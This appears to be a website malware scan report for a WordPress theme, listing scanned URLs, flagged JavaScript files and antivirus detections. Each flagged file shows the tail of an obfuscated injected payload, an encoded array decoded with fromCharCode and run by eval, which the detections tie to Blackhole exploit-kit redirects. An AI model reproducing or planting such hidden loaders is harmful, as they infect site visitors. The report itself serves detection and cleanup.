Request | Server response | Status |
http://projectgobold.com/ | 200 OK Content-Length: 15727 Content-Type: text/html | clean |
http://projectgobold.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://projectgobold.com/wp-content/themes/Chameleon/js/jquery.cycle.all.min.js?ver=1.0 | 200 OK Content-Length: 36457 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){var ver="2.99";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){$.fn.cycle.debug&&log(s);}function log(){window.console&&console.log&&console.log("[cycle] "+Array.prototype.join.call(arguments," "));}$.expr[":"].paused=function(el){return el.cyclePause;};$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing s
... 3046 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Virus.HTML.Framer
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1123
- Comodo
- TrojWare.JS.Blacole.YA
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c55c671 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Exploit.AIX
- GData
- Trojan.JS.Iframe.CTY
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/wp-content/themes/Chameleon/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=1.7 | 200 OK Content-Length: 12828 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.et_shortcodes_switcher = function(options) { var defaults = { slides: '>div', activeClass: 'active', linksNav: '', findParent: true, lengthElement: 'li', useArrows: false, arrowLeft: 'a#prev-arrow', arrowRight: 'a#next-arrow', auto: false, autoSpeed: 5000, slidePadding: '', pauseOnHover: true, fx: 'fade', sliderT
... 3239 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Virus.HTML.Framer
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1123
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c55c671 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- Trojan.JS.Iframe.CTY
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/wp-content/themes/Chameleon/js/jquery.easing.1.3.js | 200 OK Content-Length: 12508 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur
... 3278 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- Trojan.JS.Iframe.CTY
- Comodo
- TrojWare.JS.Blacole.YA
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c55c671 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- Trojan.JS.Iframe.CTY
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/wp-content/themes/Chameleon/js/superfish.js | 200 OK Content-Length: 8125 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men
... 3294 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Agent-AXQ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- VIPRE
- Trojan.JS.Generic (v)
- AVG
- HTML/Framer
- GData
- Trojan.JS.Iframe.CTY
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/wp-content/themes/Chameleon/js/custom.js | 200 OK Content-Length: 7363 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict();
var et_theme_folder = jQuery("meta[name=et_theme_folder]").attr('content'),
$et_top_menu = jQuery('ul#top-menu > li > ul'),
et_disable_toptier = jQuery("meta[name=et_disable_toptier]").attr('content');
jQuery('ul.nav').superfish({
delay: 200, animation: {opacity:'show',height:'show'}, speed: 'fast', autoArrows: true, dropShadows: fa
... 3228 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1123
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c55c671 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/wp-content/themes/Chameleon/js/jquery.nivo.slider.pack.js?ver=1.0 | 200 OK Content-Length: 20288 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function($){var NivoSlider=function(element,options){var settings=$.extend({},$.fn.nivoSlider.defaults,options);var vars={currentSlide:0,currentImage:'',totalSlides:0,randAnim:'',running:false,paused:false,stop:false};var slider=$(element);slider.data('nivo:vars',vars);slider.css('position','relative');slider.addClass('nivoSlider');var kids=slider.children();kids.each(function(){var child=$(this);var link='';if(!child.is('img')){if(child.is('a')){child.addClass('nivo-imageLink');lin
... 3084 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1123
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c55c671 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- Trojan.JS.Iframe.CTY
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/wp-content/themes/Chameleon/js/et_nivo.js?ver=1.0 | 200 OK Content-Length: 4944 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
$featured_content = jQuery('#featured #slides'),
et_featured_slider_auto = jQuery("meta[name=et_featured_slider_auto]").attr('content'),
et_featured_auto_speed = jQuery("meta[name=et_featured_auto_speed]").attr('content');
if ( $featured_content.length ){
et_nivo_slider_options = {
pauseTime: et_featured_auto_speed,
pauseOnHover:true
}
if ( et_featured_slider_auto != 1 ) et_nivo_slider_options.manualAdvance = false
... 3928 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1123
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c55c671 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- BlacoleRef.AB
- GData
- Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/wp-content/themes/Chameleon/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 11128 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('h.i[\'1a\']=h.i[\'z\'];h.O(h.i,{y:\'D\',z:9(x,t,b,c,d){6 h.i[h.i.y](x,t,b,c,d)},17:9(x,t,b,c,d){6 c*(t/=d)*t+b},D:9(x,t,b,c,d){6-c*(t/=d)*(t-2)+b},13:9(x,t,b,c,d){e((t/
... 3036 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c5592b1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Exploit.AIX
- GData
- Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/wp-content/themes/Chameleon/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 20035 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.onerror=v.onload=null;G&&G.abort();m.empty()},O=function(){if(false===e.onError(o,q,e)){t.hide();h=false}else{e.titleShow=false;e.width="auto";e.height="auto";m.html('<p id
... 3090 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Virus.HTML.Framer
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1123
- Comodo
- TrojWare.JS.Blacole.YA
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c55c671 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- Trojan.JS.Iframe.CTY
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/wp-content/themes/Chameleon/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 9492 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { jQuery("a[class*=fancybox]").fancybox({ 'overlayOpacity' : 0.7, 'overlayColor' : '#000000', 'transitionIn' : 'elastic', 'transitionOut' : 'elastic', 'easingIn' : 'easeOutBack', 'easingOut' : 'easeInBack', 'speedIn' : '700', 'centerOnScroll' : true }); jQuery("a[class*='et_video_lightbox']").click(function(){ var et_video_href = jQuery(this).attr('href'), et_video
... 3199 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-803!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1123
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c55c671 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- Trojan.JS.Iframe.CTY
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://projectgobold.com/?page_id=6 | 200 OK Content-Length: 15162 Content-Type: text/html | clean |
http://projectgobold.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://projectgobold.com/?page_id=13 | 200 OK Content-Length: 15107 Content-Type: text/html | clean |